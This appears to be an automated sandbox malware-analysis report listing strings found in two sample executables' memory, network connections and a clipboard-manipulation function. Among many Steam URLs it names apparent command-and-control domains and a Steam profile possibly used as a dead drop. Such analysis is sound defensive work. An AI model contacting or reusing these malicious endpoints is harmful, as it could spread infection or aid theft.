                Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.faP
                Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985908975.0000000000B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985908975.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222059436.0000000000BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222077563.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985908975.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222059436.0000000000BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985908975.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222059436.0000000000BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985908975.0000000000B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: C455.tmp.exe, 00000001.00000003.1941961357.0000000000B62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/#
                Source: C455.tmp.exe, 00000001.00000003.1941961357.0000000000B62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api
                Source: C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://diffuculttan.xyz/api
                Source: C455.tmp.exe, 00000001.00000003.1941961357.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1942011120.0000000000B47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/
                Source: C455.tmp.exe, 00000001.00000003.1942011120.0000000000B47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/4
                Source: C455.tmp.exe, 00000001.00000003.1941961357.0000000000B62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/api
                Source: C455.tmp.exe, 00000001.00000003.1941961357.0000000000B62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/x
                Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: C455.tmp.exe, 00000001.00000003.1985978022.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://immureprech.biz/api
                Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: TN78WX7nJU.exe, 00000000.00000002.4215422078.0000000000A32000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000003.4091067138.0000000000A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                Source: TN78WX7nJU.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                Source: TN78WX7nJU.exe, 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                Source: TN78WX7nJU.exe, 00000000.00000002.4215422078.0000000000A32000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000002.4215399552.00000000009F7000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000003.4091067138.0000000000A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou/api~
                Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222077563.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F7656Z
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985908975.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222059436.0000000000BBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222077563.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/
                Source: C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/?
                Source: C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wrathful-jammy.cyou/C
                Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
